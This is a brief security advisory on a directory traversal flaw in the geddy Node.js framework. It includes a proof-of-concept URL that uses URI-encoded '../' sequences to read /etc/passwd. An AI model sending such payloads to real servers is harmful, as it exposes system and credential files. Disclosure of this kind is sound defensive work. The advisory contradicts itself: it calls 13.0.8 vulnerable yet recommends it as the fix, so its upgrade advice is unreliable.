Directory Traversal

2015-07-27T23:33:48
ID NODEJS:10
Type nodejs
Reporter Vikram Chaitanya
Modified 2018-05-08T14:27:02

Description

Overview

Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI-encoded attack vectors.

Proof of Concept

http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Recommendation

Update geddy to version 13.0.8 or later.

References

  • https://github.com/geddy/geddy/issues/697
  • https://github.com/geddy/geddy/pull/699